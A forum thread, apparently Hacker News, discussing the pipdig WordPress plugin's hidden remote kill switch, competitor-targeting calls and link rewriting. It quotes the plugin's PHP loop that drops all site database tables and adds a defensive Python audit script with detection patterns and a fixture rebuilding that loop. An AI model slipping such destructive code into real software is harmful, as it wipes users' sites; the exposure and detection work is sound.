https://twitter.com/nickstadb/status/1112479746972151808
pipdig is a goldmine.
While the call to host switch is malicious, almost every developer in WordPress world will agree BlueHost, and their parent company with all their 50+ hosting companies, are utter garbage. The only reason they exist is because they have hired an army of bloggers and pay them affiliate income of $65 / signup.
As far as disabling Endurance Cache goes, it is completely legitimate. It's a plugin forced upon BlueHost users, without being told so, and is a "must-use" plugin that most users will never check (and can't be completely disabled from WordPress admin).
https://www.wordfence.com/blog/2019/03/peculiar-php-present-...
As for hosting providers: GoDaddy, BlueHost, etc - yes, they're all bad. But that doesn't justify moves like these.
Serious question though, on the technical part: WP needs an advanced-cache.php file, which needs to be in wp-content in order for the cache to work; this will list as dropin. Are you sure the endurance cache is MU and not dropin? (Genuine question).
I've been trying to find non-Amazon or non-Google hosting options, wanting to spend my money elsewhere. Is this a waste of time or effort? I imagine that cloud hosting with Google would be less restrictive, though more complicated to set up.
Thanks for any ideas
    global $wpdb;
    $prefix = str_replace('_', '\_', $wpdb->prefix);
    $tables = $wpdb->get_col("SHOW TABLES LIKE '{$prefix}%'");
    foreach ($tables as $table) {
        $wpdb->query("DROP TABLE $table");
    }
Essentially for those who aren't familiar with WordPress databases - this drops all tables relating to the WordPress install.

The WordPress of 2007, which I loved very much, has nothing to do with this monster of 2019.
It really is a shame, because frankly speaking - most of these plugins are utter trash anyway.
Then you get ones that can't survive minor wordpress upgrades, or are full of security holes.
The worst is when you have a highly motivated person who throws a ton of them together to build a website, and then it languishes and becomes out of date, and any upgrading you do will start culling plugins from their baby.
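Two things in this thread are worth turning into a check a site owner can actually run: the question of whether a cache component is a must-use plugin or a drop-in (neither shows on the normal Plugins screen), and the table-dropping loop quoted above. This is an added example, not pipdig's or Wordfence's code; it assumes the standard wp-content layout, the DROPINS names are the files WordPress loads automatically, and the pattern list is illustrative, with the fixture tree constructed for the demo.

```python
import os
import re
import tempfile

# Added example, not pipdig's or Wordfence's code. Assumes the standard wp-content
# layout (plugins/, mu-plugins/, drop-ins directly in wp-content/). DROPINS are the
# file names WordPress loads automatically; neither they nor mu-plugins appear on
# the normal Plugins screen, so an audit has to look for them on disk.
DROPINS = {"advanced-cache.php", "db.php", "db-error.php", "install.php",
           "maintenance.php", "object-cache.php", "php-error.php",
           "fatal-error-handler.php", "sunrise.php"}
# Leads for manual review: destructive SQL handed to $wpdb->query within one
# statement, and common obfuscation wrappers. A hit is a lead, not a verdict.
PATTERNS = {
    "destructive_sql": re.compile(r"\$wpdb->query\([^;]*?\b(DROP|TRUNCATE)\b", re.I),
    "obfuscation": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}

def audit_wp_content(wp_content):
    """Return mu-plugins, drop-ins and (relative file, pattern name) findings."""
    mu_dir = os.path.join(wp_content, "mu-plugins")
    mu = sorted(os.listdir(mu_dir)) if os.path.isdir(mu_dir) else []
    dropins = sorted(f for f in os.listdir(wp_content) if f in DROPINS)
    findings = []
    for root, _dirs, files in os.walk(wp_content):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            findings += [(os.path.relpath(path, wp_content), kind)
                         for kind, rx in PATTERNS.items() if rx.search(src)]
    return {"mu_plugins": mu, "dropins": dropins, "findings": sorted(findings)}

def build_fixture():
    """Constructed tree: placeholder mu-plugin and drop-in, plus the quoted table-dropping loop."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "mu-plugins"))
    os.makedirs(os.path.join(root, "plugins", "demo-plugin"))
    files = {
        "mu-plugins/example-cache.php": "<?php // placeholder mu-plugin\n",
        "advanced-cache.php": "<?php // placeholder drop-in\n",
        "plugins/demo-plugin/demo.php": "<?php global $wpdb; $tables = $wpdb->get_col("
            "\"SHOW TABLES LIKE 'wp\\_%'\"); foreach ($tables as $t) { $wpdb->query(\"DROP TABLE $t\"); }\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Run `audit_wp_content("/path/to/wp-content")` against a real install; anything listed under mu_plugins or dropins that you did not put there deserves the same reading as a flagged plugin file.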
Same stories emanate from the Google Play marketplace, and to a lesser extent the highly curated Apple app store marketplace. How is WordPress any different?
> you have to wade through a minefield of freemium plugins
Just like every other app store.
> for code you won't have any freedom with
Unlike smartphone apps, or apps for my PC I can and do inspect the source code of any WordPress plugin or theme.
> I have built some sites with WordPress but I have always felt stifled by the way the plugins and themes are distributed
I'd feel the same way about platforms I've only been exposed to a few times as well.
This has blown up on Twitter. Our team has stayed out of the online debate mostly other than answering questions. We're trying to just focus on the data here.
They took their public repo offline, but we mirrored it before they did that. It contradicts some claims they're making re timing. We're publishing a timeline tomorrow and are recording our weekly podcast tonight instead of tomorrow as per normal because of this insanity. We'll break it down on the show.
I guess what really jumps out at me here is how they're trying to gaslight the thing.
When we contacted them before publishing via email, they explained that someone had been pirating their software so this was a countermeasure. (quote is in the Wordfence post above) I guess the idea was that they would destroy sites using pirated licenses. Then they backpedalled that later on after this went viral.
you would think there would be different levels of user accounts and perhaps two-level authentication for any change regardless of how it is invoked
Edit: Wow, peoples' responses on Twitter are even more delusional. Wtf?
I find this so baffling. It's like being shown the bodies of a serial killer's victims, and publicly stating "oh, but he never murdered me, so why are you all complaining?"
If I'm reading this correctly, they're essentially admitting to some of the malicious features described by the researcher, but claiming that they were included for support purposes, or as a way of sabotaging sites using pirated versions of their plugin.
1. Including features which can remotely grant unauthorized access or cause damage to a user's web site is inappropriate under any circumstances. Even if they're your customers, or if they aren't your customers, or whatever. You don't do that.
2. Pipdig hasn't come up with any sensible explanation for why their license checks were pointed at a competitor's web site. It's not even clear why the license check would be architected in a way that allowed for this.
3. Altering user's site content to change links from Blogerize to Pipdig is beyond the pale. Pipdig's explanation of this feature is incoherent; it isn't even consistent with the behavior of the code presented.
4. Obfuscating the code surrounding all of these questionable bits of functionality stinks of wrongdoing. It's understandable for a license check to be a little obfuscated, perhaps, but there's no reason why a remote administration feature should be (even if it had any reason for existing).
Oh and they deleted repos apparently, gotta hide the evidence
"But all my customers love and trust me!" == "I'm just an above-average con man."
"But I was just doing this to support them without bothering them!" == "I'm clearly not ready to take responsibility and fess up to anything because I thought my deceptively named functions would fool everybody (and still do)."
"But my girlfriend and I love cat memes!" == "Please, for the love of god, can we forget about all this and talk about cat memes instead?" [I honestly have no clue what he was trying to get at in the first six paragraphs...]
They were probably obfuscating those functions to hide them from the people selling their themes. Sounds like they were also disabling this plugin as well.
But they definitely went about things the wrong way, including functions like that and obfuscating them is definitely not the right way to do things.
I think a simple, we're sorry we had included these functions in this manner to combat the company stealing our themes last year. We understand this was wrong and a fresh clean version of the plugin will be out this week.
We will do things the right way from now on, you can trust us and we welcome audits of all our code.
Some of this might be explainable in this fashion, but not all.
https://www.wordfence.com/blog/2019/03/peculiar-php-present-...
> Firstly, the plugin includes a content filter that automatically replaces references to Blogerize, a service which claims to be a beginner’s blogging course, with references to Pipdig’s own services.
> Phil you need to stop with the lies. Not only do you outright lie about having the ability to kill sites with your plugin, you state that this was implemented in response to a security breach you experienced in July 2018. The code was implemented in November 2017.
https://twitter.com/nickstadb/status/1112444919409446912
Unfortunately, pipdig wiped and recreated the repo an hour ago, so that history is no longer available there at least.
It's easy enough these days to blame things on journalists and "fake news".
One of their competitors should consider filing a complaint with the relevant authorities, so this gets formally investigated.
And original link: https://web.archive.org/web/20190401004514/https://www.jemja...
I'm getting errors when using a VPN:
> The firewall on this server is blocking your connection.
Further, they peddled this into who knows how many themes they sold and never thought they'd get caught?
"Extend your WordPress experience with 54,886 plugins."
And those are only the ones on wp.org itself; the "premium" themes are in the tens of thousands as well. It's not simple to catch these.
a) Wordpress, which is a swamp filled with mines in the form of plugins
b) Wix, which forces hosting and bad HTML on you
Basically I want a Wordpress-like frontend + the rich template ecosystem and for it to spit out static HTML files.